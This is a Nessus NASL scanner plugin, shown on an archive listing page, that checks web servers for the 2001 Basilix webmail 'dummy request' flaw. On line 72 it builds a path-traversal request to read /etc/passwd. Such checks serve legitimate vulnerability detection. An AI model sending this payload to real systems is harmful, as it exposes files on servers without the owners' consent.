home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / basilix_webmail.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  74 lines

  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # GPL
  5. #
  6. # References:
  7. # From: "karol _" <su@poczta.arena.pl>
  8. # To: bugtraq@securityfocus.com
  9. # CC: arslanm@Bilkent.EDU.TR
  10. # Date: Fri, 06 Jul 2001 21:04:55 +0200
  11. # Subject: basilix bug
  12. #
  13.  
  14.  
  15. if(description)
  16. {
  17.  script_id(11072);
  18.  script_bugtraq_id(2995);
  19.  script_version ("$Revision: 1.9 $");
  20.  script_cve_id("CAN-2001-1045");
  21.  name["english"] = "Basilix webmail dummy request vulnerability";
  22.  script_name(english:name["english"]);
  23.  
  24.  desc["english"] = "
  25. basilix.php3 is installed on this web server. Some versions
  26. of this webmail software allow the users to read any file on 
  27. the system with the permission of the webmail software, and 
  28. execute any PHP.
  29.  
  30. Solution : Update Basilix or remove DUMMY from lang.inc
  31.  
  32. Risk factor : Low";
  33.  
  34.  
  35.  script_description(english:desc["english"]);
  36.  
  37.  summary["english"] = "Checks for the presence of basilix.php3";
  38.  summary["francais"] = "VΘrifie la prΘsence de basilix.php3";
  39.  
  40.  script_summary(english:summary["english"], francais:summary["francais"]);
  41.  
  42.  script_category(ACT_GATHER_INFO); 
  43.  
  44.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  45.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  46.  family["english"] = "CGI abuses";
  47.  family["francais"] = "Abus de CGI";
  48.  script_family(english:family["english"], francais:family["francais"]);
  49.  
  50.  script_dependencie("find_service.nes", "http_version.nasl", "logins.nasl");
  51.  script_require_ports("Services/www", 80);
  52.  exit(0);
  53. }
  54.  
  55. # The script code starts here
  56. include("http_func.inc");
  57. include("http_keepalive.inc");
  58.  
  59. port = get_http_port(default:80);
  60.  
  61. if (! get_port_state(port)) exit(0);
  62. if (! can_host_php(port:port)) exit(0);
  63.  
  64. #soc = http_open_socket(port);
  65. #if (! soc) exit(0);
  66.  
  67. user = get_kb_item("http/login");
  68. pass = get_kb_item("http/password");
  69. if (! user) user="blah";
  70. if (! pass) pass="blah";
  71.  
  72. url=string("/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=", user, "&password=", pass);
  73. if(is_cgi_installed_ka(port:port, item:url)){ security_hole(port); exit(0); }
  74.